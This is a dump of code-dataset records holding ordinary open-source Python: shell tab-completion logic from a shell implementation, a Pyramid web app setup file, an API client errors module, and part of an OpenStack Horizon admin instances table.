self.words = words\n self.delay = delay\n\n def Matches(self, comp):\n for w in self.words:\n if w.startswith(comp.to_complete):\n if self.delay:\n time.sleep(self.delay)\n yield w\n\n\nclass DynamicWordsAction(CompletionAction):\n \"\"\" compgen -W '$(echo one two three)' \"\"\"\n\n def __init__(self, word_ev, splitter, arg_word, arena):\n self.word_ev = word_ev\n self.splitter = splitter\n self.arg_word = arg_word\n self.arena = arena\n\n def Matches(self, comp):\n try:\n val = self.word_ev.EvalWordToString(self.arg_word)\n except util.FatalRuntimeError as e:\n ui.PrettyPrintError(e, self.arena)\n raise\n\n # SplitForWordEval() Allows \\ escapes\n candidates = self.splitter.SplitForWordEval(val.s)\n for c in candidates:\n if c.startswith(comp.to_complete):\n yield c\n\n\nclass FileSystemAction(CompletionAction):\n \"\"\"Complete paths from the file system.\n\n Directories will have a / suffix.\n \"\"\"\n def __init__(self, dirs_only=False, exec_only=False, add_slash=False):\n self.dirs_only = dirs_only\n self.exec_only = exec_only\n\n # This is for redirects, not for UserSpec, which should respect compopt -o\n # filenames.\n self.add_slash = add_slash # for directories\n\n def Matches(self, comp):\n to_complete = comp.to_complete\n i = to_complete.rfind('/')\n if i == -1: # it looks like 'foo'\n to_list = '.'\n base = ''\n elif i == 0: # it's an absolute path to_complete like / or /b\n to_list = '/'\n base = '/'\n else:\n to_list = to_complete[:i]\n base = to_list\n #log('to_list %r', to_list)\n\n try:\n names = posix.listdir(to_list)\n except OSError as e:\n return # nothing\n\n for name in names:\n path = os_path.join(base, name)\n if path.startswith(to_complete):\n if self.dirs_only: # add_slash not used here\n # NOTE: There is a duplicate isdir() check later to add a trailing\n # slash. Consolidate the checks for fewer stat() ops. This is hard\n # because all the completion actions must obey the same interface.\n # We could have another type like candidate = File | Dir |\n # OtherString ?\n if os_path.isdir(path):\n yield path\n continue\n\n if self.exec_only:\n # TODO: Handle exception if file gets deleted in between listing and\n # check?\n if not posix.access(path, posix.X_OK):\n continue\n\n if self.add_slash and os_path.isdir(path):\n yield path + '/'\n else:\n yield path\n\n\nclass ShellFuncAction(CompletionAction):\n \"\"\"Call a user-defined function using bash's completion protocol.\"\"\"\n\n def __init__(self, ex, func):\n self.ex = ex\n self.func = func\n\n def __repr__(self):\n # TODO: Add file and line number here!\n return '<ShellFuncAction %s>' % (self.func.name,)\n\n def log(self, *args):\n self.ex.debug_f.log(*args)\n\n def Matches(self, comp):\n # Have to clear the response every time. TODO: Reuse the object?\n state.SetGlobalArray(self.ex.mem, 'COMPREPLY', [])\n\n # New completions should use COMP_ARGV, a construct specific to OSH.\n state.SetGlobalArray(self.ex.mem, 'COMP_ARGV', comp.partial_argv)\n\n # Old completions may use COMP_WORDS. It is split by : and = to emulate\n # bash's behavior. \n # More commonly, they will call _init_completion and use the 'words' output\n # of that, ignoring COMP_WORDS.\n comp_words = []\n for a in comp.partial_argv:\n AdjustArg(a, [':', '='], comp_words)\n if comp.index == -1: # compgen\n comp_cword = comp.index\n else:\n comp_cword = len(comp_words) - 1 # weird invariant\n\n state.SetGlobalArray(self.ex.mem, 'COMP_WORDS', comp_words)\n state.SetGlobalString(self.ex.mem, 'COMP_CWORD', str(comp_cword))\n state.SetGlobalString(self.ex.mem, 'COMP_LINE', comp.line)\n state.SetGlobalString(self.ex.mem, 'COMP_POINT', str(comp.end))\n\n argv = [comp.first, comp.to_complete, comp.prev]\n self.log('Running completion function %r with arguments %s',\n self.func.name, argv)\n\n status = self.ex.RunFuncForCompletion(self.func, argv)\n if status == 124:\n self.log('Got status 124 from %r', self.func.name)\n raise _RetryCompletion()\n\n # Read the response. We set it above, so this error would only happen if\n # the user unset it.\n # NOTE: 'COMP_REPLY' would follow the naming convention!\n val = state.GetGlobal(self.ex.mem, 'COMPREPLY')\n if val.tag == value_e.Undef:\n util.error('Ran function %s but COMPREPLY was not defined',\n self.func.name)\n return []\n\n if val.tag != value_e.StrArray:\n log('ERROR: COMPREPLY should be an array, got %s', val)\n return []\n self.log('COMPREPLY %s', val)\n\n # Return this all at once so we don't have a generator. COMPREPLY happens\n # all at once anyway.\n return val.strs\n\n\nclass VariablesAction(CompletionAction):\n \"\"\"compgen -A variable.\"\"\"\n def __init__(self, mem):\n self.mem = mem\n\n def Matches(self, comp):\n for var_name in self.mem.VarNames():\n yield var_name\n\n\nclass ExternalCommandAction(CompletionAction):\n \"\"\"Complete commands in $PATH.\n\n This is PART of compgen -A command.\n \"\"\"\n def __init__(self, mem):\n \"\"\"\n Args:\n mem: for looking up Path\n \"\"\"\n self.mem = mem\n # Should we list everything executable in $PATH here? And then whenever\n # $PATH is changed, regenerated it?\n # Or we can cache directory listings? What if the contents of the dir\n # changed?\n # Can we look at the dir timestamp?\n #\n # (dir, timestamp) -> list of entries perhaps? And then every time you hit\n # tab, do you have to check the timestamp? It should be cached by the\n # kernel, so yes.\n self.ext = []\n\n # (dir, timestamp) -> list\n # NOTE: This cache assumes that listing a directory is slower than statting\n # it to get the mtime. That may not be true on all systems? Either way\n # you are reading blocks of metadata. But I guess /bin on many systems is\n # huge, and will require lots of sys calls.\n self.cache = {}\n\n def Matches(self, comp):\n \"\"\"\n TODO: Cache is never cleared.\n\n - When we get a newer timestamp, we should clear the old one.\n - When PATH is changed, we can remove old entries.\n \"\"\"\n val = self.mem.GetVar('PATH')\n if val.tag != value_e.Str:\n # No matches if not a string\n return\n path_dirs = val.s.split(':')\n #log('path: %s', path_dirs)\n\n executables = []\n for d in path_dirs:\n try:\n st = posix.stat(d)\n except OSError as e:\n # There could be a directory that doesn't exist in the $PATH.\n continue\n key = (d, st.st_mtime)\n\n dir_exes = self.cache.get(key)\n if dir_exes is None:\n entries = posix.listdir(d)\n dir_exes = []\n for name in entries:\n path = os_path.join(d, name)\n # TODO: Handle exception if file gets deleted in between listing and\n # check?\n if not posix.access(path, posix.X_OK):\n continue\n dir_exes.append(name) # append the name, not the path\n\n self.cache[key] = dir_exes\n\n executables.extend(dir_exes)\n\n # TODO: Shouldn't do the prefix / space thing ourselves. readline does\n # that at the END of the line.\n for word in executables:\n if word.startswith(comp.to_complete):\n yield word\n\n\nclass GlobPredicate(object):\n \"\"\"Expand into files that match a pattern. !*.py filters them.\n\n Weird syntax:\n -X *.py or -X !*.py\n\n Also & is a placeholder for the string being completed?. Yeah I probably\n want to get rid of this feature.\n \"\"\"\n def __init__(self, include, glob_pat):\n self.include = include # True for inclusion, False for exclusion\n self.glob_pat = glob_pat # extended glob syntax supported\n\n def __call__(self, candidate):\n \"\"\"Should we INCLUDE the candidate or not?\"\"\"\n matched = libc.fnmatch(self.glob_pat, candidate)\n # This is confusing because of bash's double-negative syntax\n if self.include:\n return not matched\n else:\n return matched\n\n\nclass _DefaultPredicate(object):\n \"\"\"This is like lambda x: True, but it has a __repr__.\"\"\"\n def __call__(self, candidate):\n return True\n\n def __repr__(self):\n return '<DefaultPredicate>'\n\n\nDEFAULT_PREDICATE = _DefaultPredicate()\n\n\nclass UserSpec(object):\n \"\"\"The user configuration for completion.\n \n - The compgen builtin exposes this DIRECTLY.\n - Readline must call ReadlineCallback, which uses RootCompleter.\n \"\"\"\n def __init__(self, actions, extra_actions, else_actions, predicate,\n prefix='', suffix=''):\n self.actions = actions\n self.extra_actions = extra_actions\n self.else_actions = else_actions\n self.predicate = predicate # for -X\n self.prefix = prefix\n self.suffix = suffix\n\n def Matches(self, comp):\n \"\"\"Yield completion candidates.\"\"\"\n num_matches = 0\n\n # TODO: plusdirs could be in here, and doesn't respect predicate.\n # Fix that?\n for a in self.actions:\n is_fs_action = isinstance(a, FileSystemAction)\n for match in a.Matches(comp):\n # Special case hack to match bash for compgen -F. It doesn't filter by\n # to_complete!\n show = (\n self.predicate(match) and\n # ShellFuncAction results are NOT filtered by prefix!\n (match.startswith(comp.to_complete) or\n isinstance(a, ShellFuncAction))\n )\n\n # There are two kinds of filters: changing the string, and filtering\n # the set of strings. So maybe have modifiers AND filters? A triple.\n if show:\n yield self.prefix + match + self.suffix, is_fs_action\n num_matches += 1\n\n # NOTE: extra_actions and else_actions don't respect -X, -P or -S, and we\n # don't have to filter by startswith(comp.to_complete). They are all all\n # FileSystemActions, which do it already.\n\n # for -o plusdirs\n for a in self.extra_actions:\n for match in a.Matches(comp):\n yield match, True # We know plusdirs is a file system action\n\n # for -o default and -o dirnames\n if num_matches == 0:\n for a in self.else_actions:\n for match in a.Matches(comp):\n yield match, True # both are FileSystemAction\n\n # What if the cursor is not at the end of line? See readline interface.\n # That's OK -- we just truncate the line at the cursor?\n # Hm actually zsh does something smarter, and which is probably preferable.\n # It completes the word that\n\n def __str__(self):\n parts = ['(UserSpec']\n if self.actions:\n parts.append(str(self.actions))\n if self.extra_actions:\n parts.append('extra=%s' % self.extra_actions)\n if self.else_actions:\n parts.append('else=%s' % self.else_actions)\n if self.predicate is not DEFAULT_PREDICATE:\n parts.append('pred = %s' % self.predicate)\n if self.prefix:\n parts.append('prefix=%r' % self.prefix)\n if self.suffix:\n parts.append('suffix=%r' % self.suffix)\n return ' '.join(parts) + ')'\n\n\n# Helpers for Matches()\n\n# NOTE: We could add Lit_Dollar, but it would affect many lexer modes.\ndef IsDollar(t):\n return t.id == Id.Lit_Other and t.val == '$'\n\ndef IsDummy(t):\n return t.id == Id.Lit_CompDummy\n\n\nclass RootCompleter(object):\n \"\"\"Dispatch to various completers.\n\n - Complete the OSH language (variables, etc.), or\n - Statically evaluate argv and dispatch to a command completer.\n \"\"\"\n def __init__(self, word_ev, mem, comp_lookup, comp_state, parse_ctx,\n progress_f, debug_f):\n self.word_ev = word_ev # for static evaluation of words\n self.mem = mem # to complete variable names\n self.comp_lookup = comp_lookup\n self.comp_state = comp_state # to look up plugins\n\n self.parse_ctx = parse_ctx\n self.progress_f = progress_f\n self.debug_f = debug_f\n\n def Matches(self, comp):\n \"\"\"\n Args:\n comp: Callback args from readline. Readline uses set_completer_delims to\n tokenize the string.\n\n Returns a list of matches relative to readline's completion_delims.\n We have to post-process the output of various completers.\n \"\"\"\n arena = self.parse_ctx.arena # Used by inner functions\n\n self.parse_ctx.trail.Clear()\n line_reader = reader.StringLineReader(comp.line, self.parse_ctx.arena)\n c_parser = self.parse_ctx.MakeOshParser(line_reader, emit_comp_dummy=True)\n\n # We want the output from parse_ctx, so we don't use the return value.\n try:\n c_parser.ParseLogicalLine()\n except util.ParseError as e:\n # e.g. 'ls | ' will not parse. Now inspect the parser state!\n pass\n\n debug_f = self.debug_f\n trail = self.parse_ctx.trail\n if 1:\n trail.PrintDebugString(debug_f)\n\n # NOTE: We get Eof_Real in the command state, but not in the middle of a\n # BracedVarSub. This is due to the difference between the CommandParser\n # and WordParser.\n tokens = trail.tokens\n last = -1\n if tokens[-1].id == Id.Eof_Real:\n last -= 1 # ignore it\n\n try:\n t1 = tokens[last]\n except IndexError:\n t1 = None\n try:\n t2 = tokens[last-1]\n except IndexError:\n t2 = None\n\n debug_f.log('line: %r', comp.line)\n debug_f.log('rl_slice from byte %d to %d: %r', comp.begin, comp.end,\n comp.line[comp.begin:comp.end])\n\n debug_f.log('t1 %s', t1)\n debug_f.log('t2 %s', t2)\n\n def _MakePrefix(tok, offset=0):\n span = arena.GetLineSpan(tok.span_id)\n return comp.line[comp.begin : span.col+offset]\n #return comp.line[0 : span.col+offset]\n\n if t2: # We always have t1?\n if IsDollar(t2) and IsDummy(t1):\n prefix = _MakePrefix(t2, offset=1)\n for name in self.mem.VarNames():\n yield prefix + name\n return\n\n # echo ${\n if t2.id == Id.Left_VarSub and IsDummy(t1):\n prefix = _MakePrefix(t2, offset=2) # 2 for ${\n for name in self.mem.VarNames():\n yield prefix + name\n return\n\n # echo $P\n if t2.id == Id.VSub_DollarName and IsDummy(t1):\n # Example: ${undef:-$P\n # readline splits at ':' so we have to prepend '-$' to every completed\n # variable name.\n prefix = _MakePrefix(t2, offset=1) # 1 for $\n to_complete = t2.val[1:]\n for name in self.mem.VarNames():\n if name.startswith(to_complete):\n yield prefix + name\n return\n\n # echo ${P\n if t2.id == Id.VSub_Name and IsDummy(t1):\n prefix = _MakePrefix(t2) # no offset\n to_complete = t2.val\n for name in self.mem.VarNames():\n if name.startswith(to_complete):\n yield prefix + name\n return\n\n if t2.id == Id.Lit_ArithVarLike and IsDummy(t1):\n prefix = _MakePrefix(t2) # no offset\n to_complete = t2.val\n for name in self.mem.VarNames():\n if name.startswith(to_complete):\n yield prefix + name\n return\n\n # NOTE: Instead of looking at the column positions on line spans, we could\n # look for IsDummy() on the rightmost LiteralPart(token) of words.\n def LastColForWord(w):\n span_id = word.RightMostSpanForWord(w)\n span = arena.GetLineSpan(span_id)\n debug_f.log('span %s', span)\n debug_f.log('span col %d length %d', span.col, span.length)\n return span.col + span.length\n\n if trail.words:\n # First check if we're completing a path that begins with ~.\n #\n # Complete tilde like 'echo ~' and 'echo ~a'. This must be done at a word\n # level, and TildeDetectAll() does NOT help here, because they don't have\n # trailing slashes yet! We can't do it on tokens, because otherwise f~a\n # will complete. Looking at word_part is EXACTLY what we want.\n parts = trail.words[-1].parts\n if (len(parts) == 2 and\n parts[0].tag == word_part_e.LiteralPart and\n parts[1].tag == word_part_e.LiteralPart and\n parts[0].token.id == Id.Lit_TildeLike and\n parts[1].token.id == Id.Lit_CompDummy):\n t2 = parts[0].token\n\n # NOTE: We're assuming readline does its job, and not bothering to\n # compute the prefix. What are the incorrect corner cases?\n prefix = '~'\n to_complete = t2.val[1:]\n for u in pwd.getpwall():\n name = u.pw_name\n if name.startswith(to_complete):\n yield prefix + name + '/'\n return\n\n # Check if we should complete a redirect\n if trail.redirects:\n r = trail.redirects[-1]\n # Only complete 'echo >', but not 'echo >&' or 'cat <<'\n if (r.tag == redir_e.Redir and\n REDIR_ARG_TYPES[r.op.id] == redir_arg_type_e.Path):\n last_col = LastColForWord(r.arg_word)\n if last_col == comp.end:\n debug_f.log('Completing redirect arg')\n\n try:\n val = self.word_ev.EvalWordToString(r.arg_word)\n except util.FatalRuntimeError as e:\n debug_f.log('Error evaluating redirect word: %s', e)\n return\n if val.tag != value_e.Str:\n debug_f.log(\"Didn't get a string from redir arg\")\n return\n\n comp.Update(to_complete=val.s) # FileSystemAction uses only this\n action = FileSystemAction(add_slash=True)\n for name in action.Matches(comp):\n # TODO: form prefix from r.arg_word\n yield name\n return\n\n base_opts = None\n user_spec = None # Set below\n\n if trail.words:\n # Now check if we're completing a word!\n last_col = LastColForWord(trail.words[-1])\n debug_f.log('last_col for word: %d', last_col)\n if last_col == comp.end: # We're not completing the last word!\n debug_f.log('Completing words')\n #\n # It didn't look like we need to complete var names, tilde, redirects,\n # etc. Now try partial_argv, which may involve invoking PLUGINS.\n\n # needed to complete paths with ~\n words2 = word.TildeDetectAll(trail.words)\n if 0:\n debug_f.log('After tilde detection')\n for w in words2:\n print(w, file=debug_f)\n\n partial_argv = []\n for w in words2:\n try:\n # TODO:\n # - Should we call EvalWordSequence? But turn globbing off? It\n # can do splitting and such.\n # - We could have a variant to eval TildeSubPart to ~ ?\n val = self.word_ev.EvalWordToString(w)\n except util.FatalRuntimeError:\n # Why would it fail?\n continue\n if val.tag == value_e.Str:\n partial_argv.append(val.s)\n else:\n pass\n\n debug_f.log('partial_argv: %s', partial_argv)\n n = len(partial_argv)\n\n # TODO: Form prefix for RootCompleter to add to user_spec candidates\n if n == 0:\n # We should never get this because of Lit_CompDummy.\n raise AssertionError\n elif n == 1:\n # First\n base_opts, user_spec = self.comp_lookup.GetFirstSpec()\n else:\n base_opts, user_spec = self.comp_lookup.GetSpecForName(\n partial_argv[0])\n\n # Update the API for user-defined functions.\n index = len(partial_argv) - 1 # COMP_CWORD is -1 when it's empty\n prev = '' if index == 0 else partial_argv[index-1]\n comp.Update(first=partial_argv[0], to_complete=partial_argv[-1],\n prev=prev, index=index, partial_argv=partial_argv) \n\n # This happens in the case of [[ and ((, or a syntax error like 'echo < >'.\n if not user_spec:\n debug_f.log(\"Didn't find anything to complete\")\n return\n\n # Reset it back to what was registered. User-defined functions can mutate\n # it.\n dynamic_opts = {}\n self.comp_state.dynamic_opts = dynamic_opts\n self.comp_state.currently_completing = True\n try:\n done = False\n while not done:\n try:\n for entry in self._PostProcess(base_opts, dynamic_opts, user_spec, comp):\n yield entry\n except _RetryCompletion as e:\n debug_f.log('Got 124, trying again ...')\n\n n = len(partial_argv)\n # Get another user_spec. The ShellFuncAction may have 'sourced' code\n # and run 'complete' to mutate comp_lookup, and we want to get that\n # new entry.\n if n == 0:\n raise AssertionError\n elif n == 1:\n # First\n base_opts, user_spec = self.comp_lookup.GetFirstSpec()\n else:\n base_opts, user_spec = self.comp_lookup.GetSpecForName(\n partial_argv[0])\n else:\n done = True # exhausted candidates without getting a retry\n finally:\n self.comp_state.currently_completing = False\n\n def _PostProcess(self, base_opts, dynamic_opts, user_spec, comp):\n \"\"\"\n Add trailing spaces / slashes to completion candidates, and time them.\n\n NOTE: This post-processing MUST go here, and not in UserSpec, because it's\n in READLINE in bash. compgen doesn't see it.\n \"\"\"\n self.progress_f.Write('Completing %r ... (Ctrl-C to cancel)', comp.line)\n start_time = time.time()\n\n # TODO: dedupe candidates? You can get two 'echo' in bash, which is dumb.\n\n i = 0\n for m, is_fs_action in user_spec.Matches(comp):\n\n # - Do shell QUOTING here. Not just for filenames, but for everything!\n # User-defined functions can't emit $var, only \\$var\n # Problem: COMP_WORDBREAKS messes things up! How can I account for that?\n # '_tmp/spam\\ '\n # it stops at the first ' ' char.\n #\n # I guess you can add a COMP_WORDBREAKS suffix?\n # Or should you get rid of completion_delims altogether?\n # Then you would be constantly completing the beginning of the line?\n # TODO: write a terminal program to show that\n\n #m = util.BackslashEscape(m, SHELL_META_CHARS)\n #self.debug_f.log('after shell escaping: %s', m)\n\n # SUBTLE: dynamic_opts is part of comp_state, which ShellFuncAction can\n # mutate! So we don't want to pull this out of the loop.\n opt_filenames = False\n if 'filenames' in dynamic_opts:\n opt_filenames = dynamic_opts['filenames']\n if 'filenames' in base_opts:\n opt_filenames = base_opts['filenames']\n\n # compopt -o filenames is for user-defined actions. Or any\n # FileSystemAction needs it.\n if is_fs_action or opt_filenames:\n if os_path.isdir(m): # TODO: test coverage\n yield m + '/'\n continue\n\n opt_nospace = False\n if 'nospace' in dynamic_opts:\n opt_nospace = dynamic_opts['nospace']\n if 'nospace' in base_opts:\n opt_nospace = base_opts['nospace']\n\n if opt_nospace:\n yield m\n else:\n yield m + ' '\n\n # NOTE: Can't use %.2f in production build!\n i += 1\n elapsed_ms = (time.time() - start_time) * 1000.0\n plural = '' if i == 1 else 'es'\n self.progress_f.Write(\n '... %d match%s for %r in %d ms (Ctrl-C to cancel)', i,\n plural, comp.line, elapsed_ms)\n\n elapsed_ms = (time.time() - start_time) * 1000.0\n plural = '' if i == 1 else 'es'\n self.progress_f.Write(\n 'Found %d match%s for %r in %d ms', i,\n plural, comp.line, elapsed_ms)\n\n \nclass ReadlineCallback(object):\n \"\"\"A callable we pass to the readline module.\"\"\"\n\n def __init__(self, readline_mod, root_comp, debug_f):\n self.readline_mod = readline_mod\n self.root_comp = root_comp\n self.debug_f = debug_f\n\n self.comp_iter = None # current completion being processed\n\n def _GetNextCompletion(self, state):\n if state == 0:\n # TODO: Tokenize it according to our language. If this is $PS2, we also\n # need previous lines! Could make a VirtualLineReader instead of\n # StringLineReader?\n buf = self.readline_mod.get_line_buffer()\n\n # Readline parses \"words\" using characters provided by\n # set_completer_delims().\n # We have our own notion of words. So let's call this a 'rl_slice'.\n begin = self.readline_mod.get_begidx()\n end = self.readline_mod.get_endidx()\n\n comp = Api(line=buf, begin=begin, end=end)\n\n self.comp_iter = self.root_comp.Matches(comp)\n\n assert self.comp_iter is not None, self.comp_iter\n\n try:\n next_completion = self.comp_iter.next()\n except StopIteration:\n next_completion = None # signals the end\n\n return next_completion\n\n def __call__(self, unused_word, state):\n \"\"\"Return a single match.\"\"\"\n try:\n return self._GetNextCompletion(state)\n except util.FatalRuntimeError as e:\n # From -W. TODO: -F is swallowed now.\n # We should have a nicer UI for displaying errors. Maybe they shouldn't\n # print it to stderr. That messes up the completion display. We could\n # print what WOULD have been COMPREPLY here.\n log('Runtime error while completing: %s', e)\n self.debug_f.log('Runtime error while completing: %s', e)\n except Exception as e: # ESSENTIAL because readline swallows exceptions.\n import traceback\n traceback.print_exc()\n log('Unhandled exception while completing: %s', e)\n self.debug_f.log('Unhandled exception while completing: %s', e)\n except SystemExit as e:\n # Because readline ignores SystemExit!\n posix._exit(e.code)\n\n\nif __name__ == '__main__':\n # This does basic filename completion\n import readline\n readline.parse_and_bind('tab: complete')\n while True:\n x = raw_input('$ ')\n print(x)\n","sub_path":"core/completion.py","file_name":"completion.py","file_ext":"py","file_size_in_byte":32209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"164158386","text":"from pyramid.config import Configurator\n\nfrom pyramid.renderers import JSON\n\n# Following references needed for Sqlite creation\nfrom PythonMaps2.data.PythonMaps.TSData import TSData\nfrom PythonMaps2.data.PythonMaps.HUCs import HUCs\nfrom PythonMaps2.data.PythonMaps.stations import Stations\nfrom PythonMaps2.data.PythonMaps.db_factory import DbSessionFactory\n# from PythonMaps1.data.repository import Repository\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n with Configurator(settings=settings) as config:\n config.include('pyramid_chameleon')\n init_db(config)\n config.include('.routes')\n\n configure_renderers( config )\n\n config.add_static_view( 'shapes', 'static/shapes' )\n config.add_route( 'stations_api', '/api/stations' )\n config.add_route( 'stations1_api', '/api/usgs_stations' )\n config.add_route( 'stations2_api', '/api/load_stations' )\n config.add_route( 'stations3_api', '/api/stations_by_huc' )\n config.add_route( 'usgs_api', '/api/usgs' ) # TS by huc\n config.add_route( 'usgs2_api', '/api/usgs2' ) # TS by station\n config.add_route( 'usgs4_api', '/api/usgs4' ) # TS Validate\n config.add_route( 'usgs1_api', '/api/usgs1/{guid_id}' )\n config.add_route( 'usgs3_api', '/api/usgs' ) # unknown\n\n config.add_route( 'hucs_api', '/api/hucs' )\n config.add_route( 'hucs1_api', '/api/load_hucs' )\n # config.add_route( 'station_data_api', '/api/station_data' )\n # config.add_route( 'timeseries_data_api', '/api/timeseries_data' )\n config.scan()\n return config.make_wsgi_app()\n\n\n\ndef init_db(config):\n settings = config.get_settings()\n db_file = settings.get('db_filename')\n\n DbSessionFactory.global_init(db_file)\n\n # database_ini = settings.get('database_ini')\n # DbSessionFactory.global_init(database_ini)\n\ndef configure_renderers(config):\n json_renderer = JSON(indent=4)\n json_renderer.add_adapter(TSData, lambda c, _: c.to_dict())\n json_renderer.add_adapter(HUCs, lambda p, _: p.to_dict() )\n json_renderer.add_adapter( Stations, lambda p, _: p.to_dict() )\n config.add_renderer('json', json_renderer)","sub_path":"PythonMaps2/PythonMaps2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"122145288","text":"\"\"\" Contains shared errors types that can be raised from API functions \"\"\"\n\n\nclass UnexpectedStatus(Exception):\n    \"\"\"Raised by api functions when the response status is an undocumented status and Client.raise_on_unexpected_status is True\"\"\"\n\n    def __init__(self, status_code: int, content: bytes):\n        self.status_code = status_code\n        self.content = content\n\n        super().__init__(f\"Unexpected status code: {status_code}\")\n\n\n__all__ = [\"UnexpectedStatus\"]\n","sub_path":"clients/tabby-python-client/tabby_client/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"435332910","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 OpenStack Foundation\n# Copyright 2012 Nebula, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nimport logging\n\nfrom django import template\nfrom django.template.defaultfilters import title # noqa\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import tables\nfrom horizon.utils import filters\n\nfrom openstack_dashboard import api\nfrom openstack_dashboard.dashboards.compute.instances \\\n import tables as compute_tables\nfrom openstack_dashboard.dashboards.admin.instances \\\n import tables as admin_tables\nfrom openstack_dashboard.utils import filters as global_filters\n\nLOG = logging.getLogger(__name__)\n\n\nclass ClusterAdminTerminateInstance(compute_tables.TerminateInstance):\n redirect_url = 'horizon:cluster_admin:instances:index'\n\n\nclass AdminEditInstance(admin_tables.AdminEditInstance):\n url = \"horizon:cluster_admin:instances:update\"\n\n\nclass MigrateInstance(tables.BatchAction):\n name = \"migrate\"\n action_present = _(\"Migrate\")\n action_past = _(\"Scheduled migration (pending confirmation) of\")\n data_type_singular = _(\"Instance\")\n data_type_plural = _(\"Instances\")\n classes = (\"btn-migrate\", \"btn-danger\")\n policy_rules = ((\"compute\", \"compute_extension:admin_actions:migrate\"),)\n\n def get_policy_target(self, request, datum=None):\n project_id = None\n if datum:\n project_id = getattr(datum, 'tenant_id', None)\n return {\"project_id\": project_id}\n\n def allowed(self, request, instance):\n allowed_status = (compute_tables.ACTIVE_STATES +\n compute_tables.ARREAR_STATES)\n return ((instance.status in allowed_status\n or instance.status == 'SHUTOFF')\n and not compute_tables.is_deleting(instance))\n\n def action(self, request, obj_id):\n api.nova.server_migrate(request, obj_id)\n\n\nclass LiveMigrateInstance(tables.LinkAction):\n name = \"live_migrate\"\n verbose_name = _(\"Live Migrate Instance\")\n url = \"horizon:cluster_admin:instances:live_migrate\"\n classes = (\"ajax-modal\", \"btn-migrate\", \"btn-danger\")\n policy_rules = (\n (\"compute\", \"compute_extension:admin_actions:migrateLive\"),)\n\n def get_policy_target(self, request, datum=None):\n project_id = None\n if datum:\n project_id = getattr(datum, 'tenant_id', None)\n return {\"project_id\": project_id}\n\n def allowed(self, request, instance):\n task_state = getattr(instance, \"OS-EXT-STS:task_state\")\n allowed_status = (compute_tables.ACTIVE_STATES +\n compute_tables.ARREAR_STATES)\n return ((instance.status in allowed_status)\n and not compute_tables.is_deleting(instance)\n and task_state is None)\n\n\nclass AdminUpdateRow(tables.Row):\n ajax = True\n\n def get_data(self, request, instance_id):\n instance = api.nova.server_get(request, instance_id,\n required_admin=True)\n tenant = api.keystone.tenant_get(request,\n instance.tenant_id,\n admin=True)\n instance.full_flavor = api.nova.flavor_get(request,\n instance.flavor[\"id\"])\n instance.tenant_name = getattr(tenant, \"name\", None)\n\n # collect all floating ips\n ip_id_dic = {}\n floating_ip_list = api.neutron.FloatingIpManager(\n request, require_admin=True).list_all_fips()\n\n for floating_ip in floating_ip_list:\n if not floating_ip.instance_id:\n continue\n if floating_ip.instance_id not in ip_id_dic.keys():\n ip_id_dic[floating_ip.instance_id] = {}\n ip_id_dic[floating_ip.instance_id][floating_ip.id] = \\\n floating_ip.floating_ip_address\n if instance.id in ip_id_dic:\n instance.fips = ip_id_dic[instance.id]\n return instance\n\n\nclass AdminInstanceFilterAction(global_filters.FilterAction):\n filter_choices = (('name', _(\"Name\")), ('project', _(\"Project ID\")),\n ('image', _(\"Image ID\")))\n\n\ndef get_intranet_ips(instance):\n if hasattr(instance, \"addresses\"):\n addresses = instance.addresses\n fixed_ips = []\n for key in addresses:\n network_list = addresses[key]\n for network in network_list:\n if network['OS-EXT-IPS:type'] != 'floating':\n new_addresses = key + \"/\" + network['addr']\n fixed_ips.append(new_addresses)\n if fixed_ips:\n template_name = 'compute/instances/_instance_ips.html'\n context = {\"ips\": fixed_ips}\n return template.loader.render_to_string(template_name, context)\n return \"-\"\n\n\ndef get_public_ip(instance):\n if hasattr(instance, \"fips\"):\n template_name = 'admin/instances/_instance_ips.html'\n context = {\"ips\": instance.fips}\n return template.loader.render_to_string(template_name, context)\n return \"-\"\n\n\nclass AdminInstancesTable(tables.DataTable):\n STATUS_CHOICES = (\n (\"active\", True),\n (\"shutoff\", True),\n (\"suspended\", True),\n (\"paused\", True),\n (\"in_arrear\", True),\n (\"error\", False),\n (_(\"Active\"), True),\n (_(\"Shutoff\"), True),\n (_(\"Suspended\"), True),\n (_(\"Paused\"), True),\n (_(\"In Arrear\"), True),\n (_(\"Error\"), False),\n )\n tenant = tables.Column(\"tenant_name\", verbose_name=_(\"Project\"))\n # NOTE(gabriel): Commenting out the user column because all we have\n # is an ID, and correlating that at production scale using our current\n # techniques isn't practical. It can be added back in when we have names\n # returned in a practical manner by the API.\n # user = tables.Column(\"user_id\", verbose_name=_(\"User\"))\n host = tables.Column(\"OS-EXT-SRV-ATTR:host\",\n verbose_name=_(\"Host\"),\n classes=('nowrap-col',))\n name = tables.Column(\"name\",\n link=(\"horizon:cluster_admin:instances:detail\"),\n verbose_name=_(\"Name\"))\n image_name = tables.Column(\"image_name\",\n verbose_name=_(\"Image Name\"))\n intranet_ip = tables.Column(get_intranet_ips,\n verbose_name=_(\"Private IP\"),\n attrs={'data-type': \"ip\"})\n public_ip = tables.Column(get_public_ip,\n verbose_name=_(\"Floating IPs\"),\n attrs={'data-type': \"public_ip\"})\n size = tables.Column(admin_tables.get_size,\n verbose_name=_(\"Size\"),\n classes=('nowrap-col',),\n attrs={'data-type': 'size'})\n\n status = tables.Column(compute_tables.get_state,\n verbose_name=_(\"Status\"),\n filters=(title, filters.replace_underscores),\n status=True,\n status_choices=STATUS_CHOICES,\n display_choices=compute_tables.STATUS_DISPLAY_CHOICES)\n\n created_time = 